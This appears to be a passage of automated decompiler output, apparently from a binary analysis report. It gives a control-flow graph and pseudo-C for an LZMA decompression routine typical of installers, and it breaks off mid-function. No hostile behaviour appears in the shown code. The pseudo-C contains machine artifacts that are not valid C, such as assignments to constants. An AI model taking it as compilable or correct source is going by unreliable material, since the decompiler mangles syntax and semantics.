                                                                                      control_flow_graph 640 406c5b-406c60 641 406cd1-406cef 640->641 642 406c62-406c91 640->642 645 4072c7-4072dc 641->645 643 406c93-406c96 642->643 644 406c98-406c9c 642->644 646 406ca8-406cab 643->646 647 406ca4 644->647 648 406c9e-406ca2 644->648 649 4072f6-40730c 645->649 650 4072de-4072f4 645->650 652 406cc9-406ccc 646->652 653 406cad-406cb6 646->653 647->646 648->646 651 40730f-407316 649->651 650->651 657 407318-40731c 651->657 658 40733d-407349 651->658 656 406e9e-406ebc 652->656 654 406cb8 653->654 655 406cbb-406cc7 653->655 654->655 664 406d31-406d5f 655->664 662 406ed4-406ee6 656->662 663 406ebe-406ed2 656->663 659 407322-40733a 657->659 660 4074cb-4074d5 657->660 665 406adf-406ae8 658->665 659->658 666 4074e1-4074f4 660->666 669 406ee9-406ef3 662->669 663->669 667 406d61-406d79 664->667 668 406d7b-406d95 664->668 674 4074f6 665->674 675 406aee 665->675 671 4074f9-4074fd 666->671 670 406d98-406da2 667->670 668->670 672 406ef5 669->672 673 406e96-406e9c 669->673 677 406da8 670->677 678 406d19-406d1f 670->678 690 406e7b-406e93 672->690 691 40747d-407487 672->691 673->656 676 406e3a-406e44 673->676 674->671 680 406af5-406af9 675->680 681 406c35-406c56 675->681 682 406b9a-406b9e 675->682 683 406c0a-406c0e 675->683 686 407489-407493 676->686 687 406e4a-407013 676->687 696 407465-40746f 677->696 697 406cfe-406d16 677->697 688 406dd2-406dd8 678->688 689 406d25-406d2b 678->689 680->666 695 406aff-406b0c 680->695 681->645 693 406ba4-406bbd 682->693 694 40744a-407454 682->694 684 406c14-406c28 683->684 685 407459-407463 683->685 698 406c2b-406c33 684->698 685->666 686->666 687->665 700 406e36 688->700 702 406dda-406df8 688->702 689->664 689->700 690->673 691->666 701 406bc0-406bc4 693->701 694->666 695->674 703 406b12-406b58 695->703 696->666 697->678 698->681 698->683 700->676 701->682 706 406bc6-406bcc 701->706 707 406e10-406e22 702->707 708 406dfa-406e0e 702->708 704 406b80-406b82 703->704 705 406b5a-406b5e 703->705 711 406b90-406b98 704->711 712 406b84-406b8e 704->712 709 406b60-406b63 GlobalFree 705->709 710 406b69-406b77 GlobalAlloc 705->710 713 406bf6-406c08 706->713 714 406bce-406bd5 706->714 715 406e25-406e2f 707->715 708->715 709->710 710->674 716 406b7d 710->716 711->701 712->711 712->712 713->698 717 406be0-406bf0 GlobalAlloc 714->717 718 406bd7-406bda GlobalFree 714->718 715->688 719 406e31 715->719 716->704 717->674 717->713 718->717 721 407471-40747b 719->721 722 406db7-406dcf 719->722 721->666 722->688
                                                                                      C-Code - Quality: 98%
                                                                                      			E00406C5B() {
                                                                                      				unsigned short _t531;
                                                                                      				signed int _t532;
                                                                                      				void _t533;
                                                                                      				void* _t534;
                                                                                      				signed int _t535;
                                                                                      				signed int _t565;
                                                                                      				signed int _t568;
                                                                                      				signed int _t590;
                                                                                      				signed int* _t607;
                                                                                      				void* _t614;
                                                                                      
                                                                                      				L0:
                                                                                      				while(1) {
                                                                                      					L0:
                                                                                      					if( *(_t614 - 0x40) != 0) {
                                                                                      						 *(_t614 - 0x34) = 1;
                                                                                      						 *(_t614 - 0x84) = 7;
                                                                                      						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
                                                                                      						L132:
                                                                                      						 *(_t614 - 0x54) = _t607;
                                                                                      						L133:
                                                                                      						_t531 =  *_t607;
                                                                                      						_t590 = _t531 & 0x0000ffff;
                                                                                      						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
                                                                                      						if( *(_t614 - 0xc) >= _t565) {
                                                                                      							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
                                                                                      							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
                                                                                      							 *(_t614 - 0x40) = 1;
                                                                                      							_t532 = _t531 - (_t531 >> 5);
                                                                                      							 *_t607 = _t532;
                                                                                      						} else {
                                                                                      							 *(_t614 - 0x10) = _t565;
                                                                                      							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
                                                                                      							 *_t607 = (0x800 - _t590 >> 5) + _t531;
                                                                                      						}
                                                                                      						if( *(_t614 - 0x10) >= 0x1000000) {
                                                                                      							L139:
                                                                                      							_t533 =  *(_t614 - 0x84);
                                                                                      							L140:
                                                                                      							 *(_t614 - 0x88) = _t533;
                                                                                      							goto L1;
                                                                                      						} else {
                                                                                      							L137:
                                                                                      							if( *(_t614 - 0x6c) == 0) {
                                                                                      								 *(_t614 - 0x88) = 5;
                                                                                      								goto L170;
                                                                                      							}
                                                                                      							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
                                                                                      							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                                                                      							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                                                                                      							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
                                                                                      							goto L139;
                                                                                      						}
                                                                                      					} else {
                                                                                      						__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                                                      						__esi =  *(__ebp - 0x60);
                                                                                      						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                                                      						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                                                      						__ecx =  *(__ebp - 0x3c);
                                                                                      						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                                                      						__ecx =  *(__ebp - 4);
                                                                                      						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                                                      						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                                                      						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                      						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                      						if( *(__ebp - 0x38) >= 4) {
                                                                                      							if( *(__ebp - 0x38) >= 0xa) {
                                                                                      								_t97 = __ebp - 0x38;
                                                                                      								 *_t97 =  *(__ebp - 0x38) - 6;
                                                                                      							} else {
                                                                                      								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                                                      							}
                                                                                      						} else {
                                                                                      							 *(__ebp - 0x38) = 0;
                                                                                      						}
                                                                                      						if( *(__ebp - 0x34) == __edx) {
                                                                                      							__ebx = 0;
                                                                                      							__ebx = 1;
                                                                                      							L60:
                                                                                      							__eax =  *(__ebp - 0x58);
                                                                                      							__edx = __ebx + __ebx;
                                                                                      							__ecx =  *(__ebp - 0x10);
                                                                                      							__esi = __edx + __eax;
                                                                                      							__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                      							__ax =  *__esi;
                                                                                      							 *(__ebp - 0x54) = __esi;
                                                                                      							__edi = __ax & 0x0000ffff;
                                                                                      							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                      							if( *(__ebp - 0xc) >= __ecx) {
                                                                                      								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                      								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                      								__cx = __ax;
                                                                                      								_t216 = __edx + 1; // 0x1
                                                                                      								__ebx = _t216;
                                                                                      								__cx = __ax >> 5;
                                                                                      								 *__esi = __ax;
                                                                                      							} else {
                                                                                      								 *(__ebp - 0x10) = __ecx;
                                                                                      								0x800 = 0x800 - __edi;
                                                                                      								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                      								__ebx = __ebx + __ebx;
                                                                                      								 *__esi = __cx;
                                                                                      							}
                                                                                      							 *(__ebp - 0x44) = __ebx;
                                                                                      							if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                      								L59:
                                                                                      								if(__ebx >= 0x100) {
                                                                                      									goto L54;
                                                                                      								}
                                                                                      								goto L60;
                                                                                      							} else {
                                                                                      								L57:
                                                                                      								if( *(__ebp - 0x6c) == 0) {
                                                                                      									 *(__ebp - 0x88) = 0xf;
                                                                                      									goto L170;
                                                                                      								}
                                                                                      								__ecx =  *(__ebp - 0x70);
                                                                                      								__eax =  *(__ebp - 0xc);
                                                                                      								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                      								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                      								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      								_t202 = __ebp - 0x70;
                                                                                      								 *_t202 =  *(__ebp - 0x70) + 1;
                                                                                      								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      								goto L59;
                                                                                      							}
                                                                                      						} else {
                                                                                      							__eax =  *(__ebp - 0x14);
                                                                                      							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                      							if(__eax >=  *(__ebp - 0x74)) {
                                                                                      								__eax = __eax +  *(__ebp - 0x74);
                                                                                      							}
                                                                                      							__ecx =  *(__ebp - 8);
                                                                                      							__ebx = 0;
                                                                                      							__ebx = 1;
                                                                                      							__al =  *((intOrPtr*)(__eax + __ecx));
                                                                                      							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                                                      							L40:
                                                                                      							__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                                                      							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                                                      							__ecx =  *(__ebp - 0x58);
                                                                                      							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                                                      							 *(__ebp - 0x48) = __eax;
                                                                                      							__eax = __eax + 1;
                                                                                      							__eax = __eax << 8;
                                                                                      							__eax = __eax + __ebx;
                                                                                      							__esi =  *(__ebp - 0x58) + __eax * 2;
                                                                                      							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                      							__ax =  *__esi;
                                                                                      							 *(__ebp - 0x54) = __esi;
                                                                                      							__edx = __ax & 0x0000ffff;
                                                                                      							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                                                      							if( *(__ebp - 0xc) >= __ecx) {
                                                                                      								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                      								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                      								__cx = __ax;
                                                                                      								 *(__ebp - 0x40) = 1;
                                                                                      								__cx = __ax >> 5;
                                                                                      								__ebx = __ebx + __ebx + 1;
                                                                                      								 *__esi = __ax;
                                                                                      							} else {
                                                                                      								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                                                      								 *(__ebp - 0x10) = __ecx;
                                                                                      								0x800 = 0x800 - __edx;
                                                                                      								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                                      								__ebx = __ebx + __ebx;
                                                                                      								 *__esi = __cx;
                                                                                      							}
                                                                                      							 *(__ebp - 0x44) = __ebx;
                                                                                      							if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                      								L38:
                                                                                      								__eax =  *(__ebp - 0x40);
                                                                                      								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                                                      									while(1) {
                                                                                      										if(__ebx >= 0x100) {
                                                                                      											break;
                                                                                      										}
                                                                                      										__eax =  *(__ebp - 0x58);
                                                                                      										__edx = __ebx + __ebx;
                                                                                      										__ecx =  *(__ebp - 0x10);
                                                                                      										__esi = __edx + __eax;
                                                                                      										__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                      										__ax =  *__esi;
                                                                                      										 *(__ebp - 0x54) = __esi;
                                                                                      										__edi = __ax & 0x0000ffff;
                                                                                      										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                      										if( *(__ebp - 0xc) >= __ecx) {
                                                                                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                      											__cx = __ax;
                                                                                      											_t169 = __edx + 1; // 0x1
                                                                                      											__ebx = _t169;
                                                                                      											__cx = __ax >> 5;
                                                                                      											 *__esi = __ax;
                                                                                      										} else {
                                                                                      											 *(__ebp - 0x10) = __ecx;
                                                                                      											0x800 = 0x800 - __edi;
                                                                                      											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                      											__ebx = __ebx + __ebx;
                                                                                      											 *__esi = __cx;
                                                                                      										}
                                                                                      										 *(__ebp - 0x44) = __ebx;
                                                                                      										if( *(__ebp - 0x10) < 0x1000000) {
                                                                                      											L45:
                                                                                      											if( *(__ebp - 0x6c) == 0) {
                                                                                      												 *(__ebp - 0x88) = 0xe;
                                                                                      												goto L170;
                                                                                      											}
                                                                                      											__ecx =  *(__ebp - 0x70);
                                                                                      											__eax =  *(__ebp - 0xc);
                                                                                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      											_t155 = __ebp - 0x70;
                                                                                      											 *_t155 =  *(__ebp - 0x70) + 1;
                                                                                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      										}
                                                                                      									}
                                                                                      									L53:
                                                                                      									_t172 = __ebp - 0x34;
                                                                                      									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
                                                                                      									L54:
                                                                                      									__al =  *(__ebp - 0x44);
                                                                                      									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                                                      									L55:
                                                                                      									if( *(__ebp - 0x64) == 0) {
                                                                                      										 *(__ebp - 0x88) = 0x1a;
                                                                                      										goto L170;
                                                                                      									}
                                                                                      									__ecx =  *(__ebp - 0x68);
                                                                                      									__al =  *(__ebp - 0x5c);
                                                                                      									__edx =  *(__ebp - 8);
                                                                                      									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                      									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                      									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                      									 *( *(__ebp - 0x68)) = __al;
                                                                                      									__ecx =  *(__ebp - 0x14);
                                                                                      									 *(__ecx +  *(__ebp - 8)) = __al;
                                                                                      									__eax = __ecx + 1;
                                                                                      									__edx = 0;
                                                                                      									_t191 = __eax %  *(__ebp - 0x74);
                                                                                      									__eax = __eax /  *(__ebp - 0x74);
                                                                                      									__edx = _t191;
                                                                                      									L79:
                                                                                      									 *(__ebp - 0x14) = __edx;
                                                                                      									L80:
                                                                                      									 *(__ebp - 0x88) = 2;
                                                                                      									goto L1;
                                                                                      								}
                                                                                      								if(__ebx >= 0x100) {
                                                                                      									goto L53;
                                                                                      								}
                                                                                      								goto L40;
                                                                                      							} else {
                                                                                      								L36:
                                                                                      								if( *(__ebp - 0x6c) == 0) {
                                                                                      									 *(__ebp - 0x88) = 0xd;
                                                                                      									L170:
                                                                                      									_t568 = 0x22;
                                                                                      									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
                                                                                      									_t535 = 0;
                                                                                      									L172:
                                                                                      									return _t535;
                                                                                      								}
                                                                                      								__ecx =  *(__ebp - 0x70);
                                                                                      								__eax =  *(__ebp - 0xc);
                                                                                      								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                      								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                      								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      								_t121 = __ebp - 0x70;
                                                                                      								 *_t121 =  *(__ebp - 0x70) + 1;
                                                                                      								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      								goto L38;
                                                                                      							}
                                                                                      						}
                                                                                      					}
                                                                                      					L1:
                                                                                      					_t534 =  *(_t614 - 0x88);
                                                                                      					if(_t534 > 0x1c) {
                                                                                      						L171:
                                                                                      						_t535 = _t534 | 0xffffffff;
                                                                                      						goto L172;
                                                                                      					}
                                                                                      					switch( *((intOrPtr*)(_t534 * 4 +  &M004074FE))) {
                                                                                      						case 0:
                                                                                      							if( *(_t614 - 0x6c) == 0) {
                                                                                      								goto L170;
                                                                                      							}
                                                                                      							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                                                                      							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                                                                                      							_t534 =  *( *(_t614 - 0x70));
                                                                                      							if(_t534 > 0xe1) {
                                                                                      								goto L171;
                                                                                      							}
                                                                                      							_t538 = _t534 & 0x000000ff;
                                                                                      							_push(0x2d);
                                                                                      							asm("cdq");
                                                                                      							_pop(_t570);
                                                                                      							_push(9);
                                                                                      							_pop(_t571);
                                                                                      							_t610 = _t538 / _t570;
                                                                                      							_t540 = _t538 % _t570 & 0x000000ff;
                                                                                      							asm("cdq");
                                                                                      							_t605 = _t540 % _t571 & 0x000000ff;
                                                                                      							 *(_t614 - 0x3c) = _t605;
                                                                                      							 *(_t614 - 0x1c) = (1 << _t610) - 1;
                                                                                      							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
                                                                                      							_t613 = (0x300 << _t605 + _t610) + 0x736;
                                                                                      							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
                                                                                      								L10:
                                                                                      								if(_t613 == 0) {
                                                                                      									L12:
                                                                                      									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
                                                                                      									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
                                                                                      									goto L15;
                                                                                      								} else {
                                                                                      									goto L11;
                                                                                      								}
                                                                                      								do {
                                                                                      									L11:
                                                                                      									_t613 = _t613 - 1;
                                                                                      									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
                                                                                      								} while (_t613 != 0);
                                                                                      								goto L12;
                                                                                      							}
                                                                                      							if( *(_t614 - 4) != 0) {
                                                                                      								GlobalFree( *(_t614 - 4));
                                                                                      							}
                                                                                      							_t534 = GlobalAlloc(0x40, 0x600); // executed
                                                                                      							 *(_t614 - 4) = _t534;
                                                                                      							if(_t534 == 0) {
                                                                                      								goto L171;
                                                                                      							} else {
                                                                                      								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
                                                                                      								goto L10;
                                                                                      							}
                                                                                      						case 1:
                                                                                      							L13:
                                                                                      							__eflags =  *(_t614 - 0x6c);
                                                                                      							if( *(_t614 - 0x6c) == 0) {
                                                                                      								 *(_t614 - 0x88) = 1;
                                                                                      								goto L170;
                                                                                      							}
                                                                                      							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                                                                      							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
                                                                                      							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                                                                                      							_t45 = _t614 - 0x48;
                                                                                      							 *_t45 =  *(_t614 - 0x48) + 1;
                                                                                      							__eflags =  *_t45;
                                                                                      							L15:
                                                                                      							if( *(_t614 - 0x48) < 4) {
                                                                                      								goto L13;
                                                                                      							}
                                                                                      							_t546 =  *(_t614 - 0x40);
                                                                                      							if(_t546 ==  *(_t614 - 0x74)) {
                                                                                      								L20:
                                                                                      								 *(_t614 - 0x48) = 5;
                                                                                      								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
                                                                                      								goto L23;
                                                                                      							}
                                                                                      							 *(_t614 - 0x74) = _t546;
                                                                                      							if( *(_t614 - 8) != 0) {
                                                                                      								GlobalFree( *(_t614 - 8));
                                                                                      							}
                                                                                      							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
                                                                                      							 *(_t614 - 8) = _t534;
                                                                                      							if(_t534 == 0) {
                                                                                      								goto L171;
                                                                                      							} else {
                                                                                      								goto L20;
                                                                                      							}
                                                                                      						case 2:
                                                                                      							L24:
                                                                                      							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
                                                                                      							 *(_t614 - 0x84) = 6;
                                                                                      							 *(_t614 - 0x4c) = _t553;
                                                                                      							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
                                                                                      							goto L132;
                                                                                      						case 3:
                                                                                      							L21:
                                                                                      							__eflags =  *(_t614 - 0x6c);
                                                                                      							if( *(_t614 - 0x6c) == 0) {
                                                                                      								 *(_t614 - 0x88) = 3;
                                                                                      								goto L170;
                                                                                      							}
                                                                                      							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                                                                      							_t67 = _t614 - 0x70;
                                                                                      							 *_t67 =  &(( *(_t614 - 0x70))[1]);
                                                                                      							__eflags =  *_t67;
                                                                                      							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
                                                                                      							L23:
                                                                                      							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
                                                                                      							if( *(_t614 - 0x48) != 0) {
                                                                                      								goto L21;
                                                                                      							}
                                                                                      							goto L24;
                                                                                      						case 4:
                                                                                      							goto L133;
                                                                                      						case 5:
                                                                                      							goto L137;
                                                                                      						case 6:
                                                                                      							goto L0;
                                                                                      						case 7:
                                                                                      							__eflags =  *(__ebp - 0x40) - 1;
                                                                                      							if( *(__ebp - 0x40) != 1) {
                                                                                      								__eax =  *(__ebp - 0x24);
                                                                                      								 *(__ebp - 0x80) = 0x16;
                                                                                      								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                      								__eax =  *(__ebp - 0x28);
                                                                                      								 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                      								__eax =  *(__ebp - 0x2c);
                                                                                      								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                      								__eax = 0;
                                                                                      								__eflags =  *(__ebp - 0x38) - 7;
                                                                                      								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                      								__al = __al & 0x000000fd;
                                                                                      								__eax = (__eflags >= 0) - 1 + 0xa;
                                                                                      								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                                                      								__eax =  *(__ebp - 4);
                                                                                      								__eax =  *(__ebp - 4) + 0x664;
                                                                                      								__eflags = __eax;
                                                                                      								 *(__ebp - 0x58) = __eax;
                                                                                      								goto L68;
                                                                                      							}
                                                                                      							__eax =  *(__ebp - 4);
                                                                                      							__ecx =  *(__ebp - 0x38);
                                                                                      							 *(__ebp - 0x84) = 8;
                                                                                      							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                                                      							goto L132;
                                                                                      						case 8:
                                                                                      							__eflags =  *(__ebp - 0x40);
                                                                                      							if( *(__ebp - 0x40) != 0) {
                                                                                      								__eax =  *(__ebp - 4);
                                                                                      								__ecx =  *(__ebp - 0x38);
                                                                                      								 *(__ebp - 0x84) = 0xa;
                                                                                      								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                                                      							} else {
                                                                                      								__eax =  *(__ebp - 0x38);
                                                                                      								__ecx =  *(__ebp - 4);
                                                                                      								__eax =  *(__ebp - 0x38) + 0xf;
                                                                                      								 *(__ebp - 0x84) = 9;
                                                                                      								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                                                      								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                                                      							}
                                                                                      							goto L132;
                                                                                      						case 9:
                                                                                      							__eflags =  *(__ebp - 0x40);
                                                                                      							if( *(__ebp - 0x40) != 0) {
                                                                                      								goto L89;
                                                                                      							}
                                                                                      							__eflags =  *(__ebp - 0x60);
                                                                                      							if( *(__ebp - 0x60) == 0) {
                                                                                      								goto L171;
                                                                                      							}
                                                                                      							__eax = 0;
                                                                                      							__eflags =  *(__ebp - 0x38) - 7;
                                                                                      							_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                                                                      							__eflags = _t258;
                                                                                      							0 | _t258 = _t258 + _t258 + 9;
                                                                                      							 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                                                                      							goto L75;
                                                                                      						case 0xa:
                                                                                      							__eflags =  *(__ebp - 0x40);
                                                                                      							if( *(__ebp - 0x40) != 0) {
                                                                                      								__eax =  *(__ebp - 4);
                                                                                      								__ecx =  *(__ebp - 0x38);
                                                                                      								 *(__ebp - 0x84) = 0xb;
                                                                                      								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                                                      								goto L132;
                                                                                      							}
                                                                                      							__eax =  *(__ebp - 0x28);
                                                                                      							goto L88;
                                                                                      						case 0xb:
                                                                                      							__eflags =  *(__ebp - 0x40);
                                                                                      							if( *(__ebp - 0x40) != 0) {
                                                                                      								__ecx =  *(__ebp - 0x24);
                                                                                      								__eax =  *(__ebp - 0x20);
                                                                                      								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                      							} else {
                                                                                      								__eax =  *(__ebp - 0x24);
                                                                                      							}
                                                                                      							__ecx =  *(__ebp - 0x28);
                                                                                      							 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                      							L88:
                                                                                      							__ecx =  *(__ebp - 0x2c);
                                                                                      							 *(__ebp - 0x2c) = __eax;
                                                                                      							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                      							L89:
                                                                                      							__eax =  *(__ebp - 4);
                                                                                      							 *(__ebp - 0x80) = 0x15;
                                                                                      							__eax =  *(__ebp - 4) + 0xa68;
                                                                                      							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                                                      							goto L68;
                                                                                      						case 0xc:
                                                                                      							L99:
                                                                                      							__eflags =  *(__ebp - 0x6c);
                                                                                      							if( *(__ebp - 0x6c) == 0) {
                                                                                      								 *(__ebp - 0x88) = 0xc;
                                                                                      								goto L170;
                                                                                      							}
                                                                                      							__ecx =  *(__ebp - 0x70);
                                                                                      							__eax =  *(__ebp - 0xc);
                                                                                      							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                      							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                      							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      							_t334 = __ebp - 0x70;
                                                                                      							 *_t334 =  *(__ebp - 0x70) + 1;
                                                                                      							__eflags =  *_t334;
                                                                                      							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      							__eax =  *(__ebp - 0x2c);
                                                                                      							goto L101;
                                                                                      						case 0xd:
                                                                                      							goto L36;
                                                                                      						case 0xe:
                                                                                      							goto L45;
                                                                                      						case 0xf:
                                                                                      							goto L57;
                                                                                      						case 0x10:
                                                                                      							L109:
                                                                                      							__eflags =  *(__ebp - 0x6c);
                                                                                      							if( *(__ebp - 0x6c) == 0) {
                                                                                      								 *(__ebp - 0x88) = 0x10;
                                                                                      								goto L170;
                                                                                      							}
                                                                                      							__ecx =  *(__ebp - 0x70);
                                                                                      							__eax =  *(__ebp - 0xc);
                                                                                      							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                      							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                      							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      							_t365 = __ebp - 0x70;
                                                                                      							 *_t365 =  *(__ebp - 0x70) + 1;
                                                                                      							__eflags =  *_t365;
                                                                                      							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      							goto L111;
